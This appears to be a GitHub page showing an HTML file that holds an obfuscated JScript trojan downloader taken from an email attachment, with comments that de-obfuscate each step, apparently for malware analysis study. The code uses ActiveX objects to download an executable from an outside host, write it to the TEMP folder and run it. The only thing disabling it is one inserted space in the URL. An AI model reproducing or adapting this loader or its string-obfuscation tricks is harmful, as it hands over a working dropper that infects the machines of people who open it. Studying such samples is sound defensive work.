Permalink
Find file
Fetching contributors…
Cannot retrieve contributors at this time
144 lines (107 sloc) 7.52 KB
<!doctype html>
<html>
<head>
<title>Trojan FROM Mail Attachment</title>
<script>
/*
// For Browsers other than Internet Explorer
ActiveXObject = function(cmd){
this.command = cmd;
this.ExpandEnvironmentStrings = function(strOriginalString){return strOriginalString; }
this.send = function(){this.status = 200; par.status = 200;}
this.opEn = function(xmlHTTpObj,url,send){return xmlHTTpObj+" "+url; }
this.open = function(){return this.command; }
this.write = function(str){return str; }
this.saveToFile =function(filename, SaveOptions){var someaction =0;}
this.close = function(){var somraction=0;}
this.run =function(strCommand,intWindowStyle,bWaitOnReturn){var someaction =0;}
this.status = 0; this.type =0; this.position=0; this.ResponseBody ="responseObj"; par = this;
}
*/
alert("This is to stop Execution of this code at start and time for you to insert break points in debugger");
thickI = 0;
String.prototype.millinery = function() {
aa = this;
return aa.charAt(8 * 0 * 8); // returns the Strings characterAT(0); that is first character
};
var BilRTKUok = [
"p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX",
"o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"),
"E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"),
"" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"),
"" + "." + ("followed", "casting", "second", "exe"),
("including", "enemy", "R") + "un",
("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct",
"nlHcwmmYdvD",
"HCpQSg",
"W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"),
"LVEhhuKWtV",
("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"),
"BHyXGt",
"V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"),
("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
]; // see img BilRTKUok-01.JPG
BilRTKUok.splice(7, thickI + 2); // After splice removes 2 items; see img BilRTKUok-02.JPG
amino = BilRTKUok[1 + 4 + 1].split("condo").join(""); // = "ActiveXObject"
//var WUHOHMfe = this["ActiveXObject"];
var WUHOHMfe = this[amino];
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery(); // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); // announcements = "s"
thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2]; // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY"; // BilRTKUok[8] = "kAgWlwsNfXY"
BilRTKUok.splice(thickI + 1, thickI - 4); // After splice removes 2 items; see img BilRTKUok-03.JPG
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join(""); // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"
//var yzavYsf = new ActiveXObject("WScript.shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);
thickI++; // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join(""); // "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"
//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP");
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);
thickI /= 2; // thickI = 4
//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%")
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]);
corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery(); // corporatee = "E"
function screensaver(aristocrat, welter) {
// aristocrat = "http: //dev.fanjapan.com/762trg22e2 .exe"
// welter = "FfXlke"
try {
var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI]; // = "%TEMP%/FfXlke.exe"
var open ="o" + statement + corporatee + "n"; // = "opEn"
var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // = "GET"
// MSXML2.XMLHTTP.open("GET","http ://dev.fanjapan.com/762trg22e2 .exe", false);
QcarAWR[open](meth, aristocrat, false);
var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery(); // = send
QcarAWR[func2](); // MSXML2.XMLHTTP.send();
if (QcarAWR.status == 200) {
var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D"); // = "ADODB.Stream"
// var hytSjp = new ActiveXObject("ADODB.Stream");
var hytSjp = new WUHOHMfe(func3);
var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen"); // = "open"
//ADODB.Stream.open();
hytSjp[func4]();
hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1
var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" ; // = write
var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy"; // = "ResponseBody"
//ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody);
hytSjp[func5](QcarAWR[func6]);
var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // = position
hytSjp[func7] = 0; // ADODB.Stream.position = 0
var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile"); // = saveToFile
// ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite);
hytSjp[func8](transmit, 2);
hytSjp.close(); // ADODB.Stream.close();
//WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo"); // "TPYHPf" === "LDNSGABujeo" means false
}
}
catch (cNINLnxTF) {
console.log(cNINLnxTF);
};
}
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + " exe", "FfXlke"); //To disable the live virus i added a extra space to the "exe"
</script>
</head>
<body>
</body>
</html>